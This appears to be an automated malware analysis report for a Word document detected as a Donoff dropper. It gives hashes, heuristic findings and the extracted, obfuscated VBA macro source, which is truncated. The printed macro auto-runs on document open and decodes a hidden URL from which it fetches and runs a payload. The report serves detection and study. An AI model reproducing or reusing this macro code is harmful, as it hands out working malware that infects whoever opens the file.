Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc0fbe8e53317332…

MALICIOUS

Office (OLE)

103.5 KB Created: 2016-05-31 21:52:00 Authoring application: Microsoft Office Word First seen: 2017-12-24
MD5: e58d73b19f4f7d2853b0481bf27de008 SHA-1: 5ef52238710fb4d58e566613530823881134dfdf SHA-256: fc0fbe8e5331733273a6bc09d8b58c0613300e0ff9fc48543f8dd573ef340275
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The presence of CreateObject and CallByName calls further indicates the execution of arbitrary code. The ClamAV detection name 'Doc.Dropper.Donoff-5743527-0' strongly suggests its function as a dropper for other malware. The VBA script is heavily obfuscated, but its structure and the heuristic firings confirm its malicious intent to download and execute a payload.

Heuristics 7

  • ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19328 bytes
SHA-256: e59402e058f17a2490d064bbd8664bbb1f417f3d8febce34afee93ff4fdee47d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub FglkJe(ByVal dKbDfhdPxm As String, ByVal eDyzqTFh As Integer)
duFvgyGLvAiX True, "3M4QzRH7cvc4tfKPR", 9044
KvLItshrUAtfU "WZpGGksufouOBhpcx4gstEAJt72Z2TJXx", "HxKVoQrb74ybQRU7b"
rPYNNhgzRths
bpMPb = 6741
If txVsQLajuHZ("zJyAl7OD7hoNqIaXns8uL137lvOYTR", 886, 440) Then
nqBWmQx = 9024
DQVYa
FDEThcufga 1883
vOvunB = 3192
jqxgrV "oHycHtSvfKMQs74JSzMeGAIsPlN4Z426H"
GWGirdwEjLgUSV = "n5VEAQiBLojRpQVkhz7"
Else
MiPKXMW 653, 5024, 4694
zcuVJ "vSiwakLGjNJeMFMPHoDpPJpifnJuVVG", 9258
oDeQHIThrOqgus
YwfxT = False
End If
End Sub
Private Sub kzhyT(ByVal XwYtGmEyq As Integer)
tMEPTtmgTk "CFSHU8371qufFbcKNI", "0OrgguxhFwvCFKfOKoIQadIuM8jBMakkB", "2quudMXLiQQTWjV7DynGsELmD"
WkALMaHFYgmzB = 358
iAbMVpFFUAvY
lJeFJ = "SDdpNNr9BIgrhzntvQYPGF4ib"
If oIVZgcWzGcDO(True, 55, True) Then
srxJUdSAXotua = 4069
LnSXmAUCKhKIt 555, "GdRjZz0kr63HB07nSF", 2131
AzHNWcyq = "wrHrJRjm2gDSRvwUlDP"
gZsZqh
Else
thFWvVThd
RYnGiKcIspZM 9355
Wrncd = "ptYOzqv5svutDrb85UnlZ9"
End If
End Sub
Private Sub Document_Open()
Dim KRyorhA As Integer
Dim WzkRsNlPO As Boolean
OxXRPkW.hDXtXVa
End Sub

Attribute VB_Name = "OxXRPkW"
Private Sub Lqdksr(ByVal WtRbGmGZzEX As String, ByVal olflBdNgAIe As String)
ldKAeM "eKEzZenNJS04qc2lu"
DrFIcEQi = "rNKN5RIKAeoM3x86jDzJ3iaxO"
NsvPnxy "bbl6nL1V2c6VAaJx1uutPe", "rKdJPbGxisyOrfFmb9eSLa5hUcT", True
End Sub
Private Sub nyMyAjP(ByVal ydENmMsHvpaCoK As Integer, ByVal qOdUAxmAZe As String)
iEVDQ 3110
BOpTlAijpQyoy = 6371
ASNCouqsPiPZ "6xXH1yMR63G4Al6j16wiJp3xt6uP", "8zwcTyf5gLG0VJTUoAIWmOlpr8lp"
AEDSPxlawiNNs = True
dZTfDVECLgbm
End Sub
Private Sub fYFEIGmcIx(ByVal JfzBch As String, ByVal CjYjxRvkZIc As Boolean)
iEpIYnmkp
UFGNwCOBuGRrRI
nVfmqjmOhT
End Sub
Public Function rVHBjbWfheWa(ByVal qPwcjUuCV As String, ByVal AOkvITzTYtpe As String) As Object
Dim aKiXb As Integer
Dim mafCEjNDvc As String
Set rVHBjbWfheWa = aJqseTJ(CreateObject(qPwcjUuCV))
End Function
Public Sub hDXtXVa()
Dim PJoAAeYnbXosc As String
Dim hvMsmacL As Integer
On Error GoTo beFlsNuLXLO
iETIhSiqsUzM.pTabca
iETIhSiqsUzM.bLATonaG
lXsWBpQSVnwlSo
Exit Sub
beFlsNuLXLO:
End Sub
Private Sub hXxZDfg(ByVal oKWSuBa As String)
xDiUyVi = "vn9GXjTcaOQlT5tL4exHEa5n"
If xWxeOExKHSxnwQ Then
VYBwGVdSxrm False, "OcWagph4cTGgy2JVC2qmzhJSLzBCt9b"
ghkCBqoxzNfu
XTsEfiDrBR True
Else
XZUDa 2123
End If
TOJmzGxRrAIb "girjHFDe2uk2XbcuY1", 972
End Sub
Private Function aJqseTJ(ByVal dCVmFC As Object) As Object
Dim sqpUIRaYASVzW As Integer
Set aJqseTJ = dCVmFC
End Function
Private Sub YYhfh(ByVal tfKmiGuac As String, ByVal tHEkErKkaI As String, ByVal RuBgK As String)
Set OnIhiNW = IVLhPqfAc.zRwFEon(True, RuBgK)
IVLhPqfAc.uEVvW wyCVXJHf, 2670, "5PfNIFcGdApLMx0hc", OnIhiNW
EVviFiQJUnxO.UrzHvEsGLBsfwh WzGwYmEpG.rWXKssObshMAsG(fRUgghOHQON, OnIhiNW, 8879), False, "ug2SdwA1GSbqNhL8ACyEfBNIOUo5", tfKmiGuac
End Sub
Private Sub lXsWBpQSVnwlSo()
Dim Fwjaaere As Boolean
YYhfh EVviFiQJUnxO.FlXSJM, "8B95HZ255W3X0bd0eQoKg5", XhggcqXOZBCo
EVviFiQJUnxO.xDxisHynv False, 618, EVviFiQJUnxO.FlXSJM
End Sub
Private Function wyCVXJHf() As String
wyCVXJHf = xybKKSQbijzVLK.tkmpTElNtK("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function fRUgghOHQON() As String
fRUgghOHQON = xybKKSQbijzVLK.tkmpTElNtK("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function XhggcqXOZBCo() As String
XhggcqXOZBCo = xybKKSQbijzVLK.tkmpTElNtK("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function

Attribute VB_Name = "xybKKSQbijzVLK"
Private Function LTpEppfdJF(ByVal KtaCybtReUgjrG As Integer, ByVal thXoVwfXEsWuT As Integer, ByVal QoNyNfVV As String, ByVal AvbCqQNtuZrC As String) As String
If Not lICItchqi.htczxBQXSk(AvbCqQNtuZrC, Fals
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.